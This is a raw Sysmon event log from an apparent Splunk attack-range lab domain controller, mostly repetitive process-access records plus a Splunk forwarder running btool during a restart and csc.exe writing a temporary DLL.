15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0501-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7CDA-5FA1-0401-000000008801}27483156C:\Windows\system32\cmd.exe{D28789B6-7CDA-5FA1-0501-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.163{D28789B6-7CDA-5FA1-0501-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDA-5FA1-0401-000000008801}2748C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0401-000000008801}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0401-000000008801}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7CDA-5FA1-0401-000000008801}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.159{D28789B6-7CDA-5FA1-0401-000000008801}2748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676 11241100x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:57.995{D28789B6-7CD9-5FA1-0201-000000008801}1164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\rnjnhxos\rnjnhxos.dll2020-11-03 15:52:57.932 10341000x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0301-000000008801}2652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 